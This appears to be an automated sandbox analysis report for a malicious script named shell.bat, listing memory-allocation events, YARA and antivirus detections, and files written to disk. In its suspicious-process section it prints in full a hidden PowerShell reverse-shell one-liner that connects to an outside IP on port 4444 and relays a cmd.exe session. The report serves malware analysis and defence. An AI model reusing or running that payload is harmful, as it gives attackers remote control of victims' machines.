NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02224000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02226000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02227000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02228000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02229000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02993000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02994000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02995000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02996000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02997000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02998000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02999000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0299f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"cmd.exe"

cmdline

powershell -w hidden -nop -c $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 4, 2024, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

80.76.176.23

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"cmd.exe"

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-w hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Lionic	Trojan.Script.Boxter.m!c
VIPRE	Heur.BZC.PZQ.Boxter.651.479BCFD5
Arcabit	Heur.BZC.PZQ.Boxter.651.479BCFD5
Symantec	Trojan.Gen.NPE
ESET-NOD32	PowerShell/ReverseShell.BD
Avast	Script:SNH-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Backdoor.PowerShell.Agent.gen
BitDefender	Heur.BZC.PZQ.Boxter.651.479BCFD5
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.651.479BCFD5
Rising	Backdoor.Agent/PS!1.FF8D (CLASSIC)
Emsisoft	Heur.BZC.PZQ.Boxter.651.479BCFD5 (B)
F-Secure	Exploit.EXP/YAV.Minerva.lcapd
DrWeb	PowerShell.ReverseShell.24
FireEye	Heur.BZC.PZQ.Boxter.651.479BCFD5
Ikarus	Trojan.Script
Google	Detected
Avira	EXP/YAV.Minerva.lcapd
MAX	malware (ai score=85)
Kingsoft	Win32.Troj.Undef.a
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	HEUR:Backdoor.PowerShell.Agent.gen
GData	Heur.BZC.PZQ.Boxter.651.479BCFD5
Varist	PSH/Agent.QT
Tencent	Win32.Backdoor.Agent.Ekjl
huorong	Backdoor/Meterpreter.bo
AVG	Script:SNH-gen [Trj]
alibabacloud	Backdoor:Win/ReverseShell.BF

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

80.76.176.23:4444

shell.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All